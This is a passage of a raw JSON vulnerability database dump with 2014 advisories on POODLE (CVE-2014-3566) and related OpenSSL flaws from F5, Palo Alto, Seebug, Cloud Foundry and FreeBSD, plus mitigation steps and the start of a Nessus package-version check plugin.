through 11.4.1, you can create a custom cipher string for the SSL profile using the RC4-SHA ciphers. To do so, perform the following procedure.\n\n**Impact of procedure:** Clients that do not support the RC4-SHA cipher will fail to establish a connection to the virtual server. RC4 ciphers are not FIPS compliant.\n\n 1. Log in to the **tmsh** utility** **by typing the following command: \n\ntmsh\n\n 2. Create a custom SSL profile that specifies the RC4-SHA ciphers by using the following syntax: \n\ncreate /ltm profile <client-ssl / server-ssl> <profile_name> ciphers !SSLv3:RC4-SHA\n\nFor example, the following command creates a custom client SSL profile named TLS-Padding:\n\ncreate /ltm profile client-ssl TLS-Padding ciphers !SSLv3:RC4-SHA\n\n 3. Save the configuration by typing the following command: \n\nsave /sys config\n\n 4. Associate the SSL profile with the virtual servers.\n\n * [CVE-2014-3566 POODLE vs CVE-2014-8730 TLS POODLE](<https://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle>) \n \n**Note**: A DevCentral login is required to access this content.\n * [K15702: SSLv3 vulnerability CVE-2014-3566](<https://support.f5.com/csp/article/K15702>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)](<https://support.f5.com/csp/article/K7815>)\n", "reporter": "f5", "published": "2014-12-08T22:21:00", "title": "TLS1.x padding vulnerability CVE-2014-8730", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2017-06-27T18:31:00", "id": "F5:K15882", "href": "https://support.f5.com/csp/article/K15882", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:06", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/6000/400/sol6462.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended action\n\nIf you are running a version listed in the** Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists. \n \nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy. \n\n\nTo mitigate these vulnerabilities for affected systems, you can restrict access to the Configuration utility to only trusted networks, and limit login access to only trusted users.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2014-10-21T00:00:00", "title": "SOL15723 - OpenSSL vulnerability CVE-2014-3567", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP ASM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.1 HF5", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1 HF4", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.0 HF5", "operator": "le"}, {"name": "FirePass", "version": "6.1.0", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP Edge Gateway\n", "version": "11.3.0", "operator": "le"}, {"name": "FirePass", "version": "7.0.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "Enterprise Manager", "version": "2.3.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.4.0", "operator": "le"}, {"name": "LineRate", "version": "2.4.1", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "LineRate", "version": "2.2.6", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.4.0", "operator": "le"}, {"name": "ARX", "version": "6.4.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway\n", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.4.1 HF6", "operator": "le"}], "cvelist": ["CVE-2014-3567"], "modified": "2015-11-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15723.html", "id": "SOL15723", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "paloalto": [{"lastseen": "2018-07-04T09:48:51", "references": [], "description": "A vulnerability affecting most implementations of SSL 3.0 has been discovered that allows an attacker to decrypt some encrypted contents under certain conditions (CVE-2014-3566). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue. More information can be found at: https://www.openssl.org/~bodo/ssl-poodle.pdf. SSL 3.0 is a supported protocol in PAN-OS services including device management and SSL VPN.\n", "edition": 1, "reporter": "Palo Alto Networks Product Security Incident Response Team", "published": "2014-10-20T00:00:00", "title": "SSL 3.0 MITM Attack (CVE-2014-3566)", "type": "paloalto", "enchantments": {"score": {"modified": "2018-07-04T09:48:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PAN-OS", "version": "6.1.1", "operator": "le"}, {"name": "PAN-OS", "version": "5.0.", "operator": "le"}, {"name": "PAN-OS", "version": "6.0.7", "operator": "le"}, {"name": "PAN-OS", "version": "5.1.", "operator": "le"}], "cvelist": ["CVE-2014-3566"], "modified": "2014-10-20T00:00:00", "id": "PAN-SA-2014-0005", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/25", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T12:01:42", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "# SSL 3.0 POODLE attack information disclosure Vulnerability(CVE-2014-3566)\n\n * Release date: 2014-10-14\n * Update date: 2014-10-16\n\n### Affected system:\n\n * Netscape ssl 3.0\n * Netscape tls\n\n### Not affected system:\n\n * Netscape tls 1.2\n * Netscape tls 1.1\n * Netscape tls 1.0\n\n## Description:\n\nCVE(CAN) ID: CVE-2014-3566\n\nSSL3. 0 is an obsolete and insecure Protocol, has now been TLS 1.0, TLS 1.1, TLS 1.2 alternative, because of compatibility reasons, most TLS implementations remain compatible with SSL3. To 0.\n\nFor commonality considerations, currently most browsers version support SSL3. 0, TLS Protocol handshake phase contains a version negotiation step, in General, the client and server to the latest version of the Protocol will be used. Its in the server side of the handshake phase for version negotiation, first offer its support agreement to the latest version, if the handshake fails, then try with the older version of the Protocol negotiation. Be able to implement man in the middle attacks the attacker by making the affected versions of the browser and the server using newer Protocol negotiation failed connection, you can successfully achieve a downgrade attack, so that the client and the server using the insecure SSL3. 0 communicate, in this case, since the SSL 3.0 use of CBC block encryption implementation vulnerability exists, an attacker can successfully crack the SSL connections encrypt the information, such as access to user cookie data. This attack is called POODL attack(Padding Oracle On Downgraded Legacy Encryption) is.\n\nThis vulnerability affected the vast majority of SSL server and client, the impact of a wide range. But the attacker as to the use of successful, need to be able to control the client and server between the data(perform a MiTM attack).\n\nHow to fix POODLE SSLv3 security vulnerability (CVE-2014-3566) http://www.linuxidc.com/Linux/2014-10/108103.htm\n\n## Recommendations\n\nTemporary workaround:\n\nIf you can not immediately install patches or upgrades, NSFOCUS recommend that you take the following measures to reduce the threat:\n\n * Disable the SSL 3.0 Protocol.\n\nThe current popular browsers, only IE 6.0 still does not support TLS 1.0, disable SSL 3.0 Protocol will affect IE 6 clients SSL access.\n\n## The service end of the Disable method:\n\n### Apache 2. x\n\nIn the mod_ssl configuration file use the following command to disable SSLv2 and SSLv3 with: SSLProtocol All-SSLv2-SSLv3 Restart Apache\n\n### Nginx\n\nIn the configuration file to use: ssl_protocols TLSv1 TLSv1. 1 TLSv1. 2; Restart Nginx\n\n### IIS\n\nFind the following registry key: HKey_Local_Machine\\System\\CurrentControlSet\\Control\\SecurityProviders \\SCHANNEL\\Protocols This registry key usually contains the following sub-items:\n\n * PCT 1.0\n * SSL 2.0\n * SSL 3.0\n * TLS 1.0\n\nEach of the registry entries are reserved for in the Protocol-related information. Can be on the server, disable these protocols in any one. To do this, the Protocol SSL 3.0, the server subkey create a new DWORD Value. The DWORD value is set to\u201c00 00 00 00\u201dit.\n\n## Browser disable method:\n\nIE: \"Tools\" -> \"Internet Options\" -> \"Advanced\", uncheck\"use SSL 3.0\"check box.\n\nChrome:\n\nCopy a usually open Chrome browser shortcuts, the new shortcut on right-click, Go into properties, In the\"target\"behind the spaces in the end of the field, enter the following command --ssl-version-min=tls1\n\nFireFox:\n\nIn the address bar enter\"about:config\", and then the security. tls. version. min adjusted to 1.\n\n### Reference:\n\n * https://www.openssl.org/~bodo/ssl-poodle. pdf\n * http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html \n * https://technet.microsoft.com/en-us/library/security/3009008\n", "reporter": "janes", "published": "2017-02-17T00:00:00", "type": "seebug", "title": "SSL 3.0 POODLE\uff08CVE-2014-3566\uff09", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2017-02-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92692", "id": "SSV:92692", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "cve,poc,details"}], "cloudfoundry": [{"lastseen": "2018-01-12T14:52:51", "references": [], "description": "CVE-2014-3566 SSLV3 POODLE\n\n# \n\nModerate\n\n# Vendor\n\nThe SSL protocol 3.0, as used in OpenSSL through 1.0.1i\n\n# Versions Affected\n\n * SSLv3 \n\n# Description\n\nSSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346] and TLS 1.2 [RFC5246], many TLS implementations remain backwards \u00adcompatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.\n\nThe protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used. However, even if a client and server both support a version of TLS, the security level offered by SSL 3.0 is still relevant since many clients implement a protocol downgrade dance to work around server\u00adside interoperability bugs. Attackers can exploit the downgrade dance and break the cryptographic security of SSL 3.0. Our POODLE attack (Padding Oracle On Downgraded Legacy Encryption) will allow them, for example, to steal \u201csecure\u201d HTTP cookies (or other bearer tokens such as HTTP Authorization header contents).\n\n# Affected Products and Versions\n\n_Severity is moderate unless otherwise noted. \n_\n\n * BOSH: All versions of Cloud Foundry BOSH stemcells 2743 and prior use SSLv3 and thus are vulnerable to CVE-2014-3356 \n * tc Server 2.9.0 to 2.9.7 and 3.0.0 to 3.0.1. Previous, unsupported tc Server versions may also be affected. \n\n# Mitigation\n\nThe Cloud Foundry project recommends that HAProxy or any other ELBs is use be updated to disable SSLv3 as a workaround that resolves CVE-2014-3566.\n\nThe details published by the Apache Software Foundation for [mitigating this attack for Apache Tomcat](<https://wiki.apache.org/tomcat/Security/POODLE>) apply equally to tc Runtime instances. The tc Server team is tracking the work of the Apache Tomcat project to release versions of Apache Tomcat that disable SSLv3 by default. tc Server releases will follow the releases from the Apache Software Foundation.\n\n# Credit\n\nGoogle researchers Bodo M\u00f6ller, Thai Duong and Krzysztof Kotowicz released a [paper](<https://www.openssl.org/~bodo/ssl-poodle.pdf>) discussing a serious bug in SSL 3.0 that allows attackers to conduct man-in-the-middle attacks and decrypt the traffic between Web servers and end users.\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566>\n * <https://www.openssl.org/~bodo/ssl-poodle.pdf>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n * <https://wiki.apache.org/tomcat/Security/POODLE>\n\n# History\n\n2014-Oct-16: Initial vulnerability report published.\n\n2013-Nov-03: Updated to include tc Server information\n", "edition": 1, "reporter": "Cloud Foundry", "published": "2014-10-16T00:00:00", "type": "cloudfoundry", "title": "CVE-2014-3566 SSLV3 POODLE - Cloud Foundry", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2014-3566", "CVE-2014-3356"], "modified": "2014-10-16T00:00:00", "href": "https://www.cloudfoundry.org/blog/cve-2014-3566/", "id": "CFOUNDRY:ACE3C7E4A01EEFAC1C8D47279076DC77", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2016-09-26T17:24:19", "references": ["http://sourceforge.net/p/davmail/mailman/message/33279118/", "http://sourceforge.net/p/davmail/code/2322/"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.6.0", "packageName": "davmail", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "\nMicka\u00c3\u00abl Guessant reports:\n\nDavMail 4.6.0 released\nEnhancements: Fix potential CVE-2014-3566 vulnerability.\n\n", "reporter": "FreeBSD", "published": "2014-10-27T00:00:00", "title": "davmail -- fix potential CVE-2014-3566 vulnerability (POODLE)", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-27T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/384fc0b2-0144-11e5-8fda-002590263bf5.html", "id": "384FC0B2-0144-11E5-8FDA-002590263BF5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:24:23", "references": ["http://downloads.asterisk.org/pub/security/AST-2014-011.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.8.31.1", "packageName": "asterisk", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "11.13.1", "packageName": "asterisk11", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "\nThe Asterisk project reports:\n\nThe POODLE vulnerability is described under CVE-2014-3566.\n\t This advisory describes the Asterisk's project susceptibility\n\t to this vulnerability.\n\n", "reporter": "FreeBSD", "published": "2014-10-20T00:00:00", "title": "asterisk -- Asterisk Susceptibility to POODLE Vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-20T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/76c7a0f5-5928-11e4-adc7-001999f8d30b.html", "id": "76C7A0F5-5928-11E4-ADC7-001999F8D30B", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-01-09T18:01:21", "references": ["https://hg.java.net/hg/solaris-userland~gate/file/bc5351dcb9ac/components/lynx/patches/02-init-openssl.patch", "https://hg.java.net/hg/solaris-userland~gate/file/0a979060f73b/components/lynx/patches/05-fix-CVE-2016-9179.patch"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.8.8.2_5,1", "arch": "noarch", "packageName": "lynx", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "\nOracle reports:\n\nLynx is vulnerable to POODLE by still supporting vulnerable\n\t version of SSL. Lynx is also vulnerable to URL attacks by incorrectly\n\t parsing hostnames ending with an '?'.\n\n", "reporter": "FreeBSD", "published": "2016-10-26T00:00:00", "title": "lynx -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2016-9179"], "modified": "2016-10-26T00:00:00", "id": "03532A19-D68E-11E6-9171-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/03532a19-d68e-11e6-9171-14dae9d210b8.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-26T17:24:23", "references": ["https://www.openssl.org/news/secadv_20141015.txt"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1", "packageName": "mingw32-openssl", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1", "packageName": "openssl", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1j", "packageName": "mingw32-openssl", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "8.4", "packageName": "FreeBSD", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "8.4_17", "packageName": "FreeBSD", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1e_1", "packageName": "linux-c6-openssl", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.0.1_16", "packageName": "openssl", "arch": "noarch", "packageFilename": "UNKNOWN", "operator": "lt"}], "edition": 1, "description": "\nThe OpenSSL Project reports:\n\nA flaw in the DTLS SRTP extension parsing code allows an\n\t attacker, who sends a carefully crafted handshake message,\n\t to cause OpenSSL to fail to free up to 64k of memory causing\n\t a memory leak. This could be exploited in a Denial Of Service\n\t attack. This issue affects OpenSSL 1.0.1 server implementations\n\t for both SSL/TLS and DTLS regardless of whether SRTP is used\n\t or configured. Implementations of OpenSSL that have been\n\t compiled with OPENSSL_NO_SRTP defined are not affected.\n\t [CVE-2014-3513].\nWhen an OpenSSL SSL/TLS/DTLS server receives a session\n\t ticket the integrity of that ticket is first verified.\n\t In the event of a session ticket integrity check failing,\n\t OpenSSL will fail to free memory causing a memory leak.\n\t By sending a large number of invalid session tickets an\n\t attacker could exploit this issue in a Denial Of Service\n\t attack. [CVE-2014-3567].\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow\n\t applications to block the ability for a MITM attacker to\n\t force a protocol downgrade.\nSome client applications (such as browsers) will reconnect\n\t using a downgraded protocol to work around interoperability\n\t bugs in older servers. This could be exploited by an active\n\t man-in-the-middle to downgrade connections to SSL 3.0 even\n\t if both sides of the connection support higher protocols.\n\t SSL 3.0 contains a number of weaknesses including POODLE\n\t [CVE-2014-3566].\nWhen OpenSSL is configured with \"no-ssl3\" as a build option,\n\t servers could accept and complete a SSL 3.0 handshake, and\n\t clients could be configured to send them. [CVE-2014-3568].\n\n", "reporter": "FreeBSD", "published": "2014-10-15T00:00:00", "title": "OpenSSL -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2016-08-09T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/03175e62-5494-11e4-9cc1-bc5ff4fb5e7b.html", "id": "03175E62-5494-11E4-9CC1-BC5FF4FB5E7B", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2017-10-29T13:44:45", "references": ["http://www.nessus.org/u?be559c31", "http://sourceforge.net/p/davmail/mailman/message/33279118/", "http://sourceforge.net/p/davmail/code/2322/"], "pluginID": "83794", "edition": 3, "description": "Mickael Guessant reports :\n\nDavMail 4.6.0 released\n\nEnhancements: Fix potential CVE-2014-3566 vulnerability.", "reporter": "Tenable", "published": "2015-05-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "FreeBSD : davmail -- fix potential CVE-2014-3566 vulnerability (POODLE) (384fc0b2-0144-11e5-8fda-002590263bf5) (POODLE)", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:davmail"], "modified": "2016-10-19T00:00:00", "id": "FREEBSD_PKG_384FC0B2014411E58FDA002590263BF5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83794", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83794);\n script_version(\"$Revision: 2.6 $\");\n script_cvs_date(\"$Date: 2016/10/19 14:02:54 $\");\n\n script_cve_id(\"CVE-2014-3566\");\n\n script_name(english:\"FreeBSD : davmail -- fix potential CVE-2014-3566 vulnerability (POODLE) (384fc0b2-0144-11e5-8fda-002590263bf5) (POODLE)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mickael Guessant reports :\n\nDavMail 4.6.0 released\n\nEnhancements: Fix potential CVE-2014-3566 vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://sourceforge.net/p/davmail/mailman/message/33279118/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://sourceforge.net/p/davmail/code/2322/\"\n );\n # http://www.freebsd.org/ports/portaudit/384fc0b2-0144-11e5-8fda-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be559c31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:davmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"davmail<4.6.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 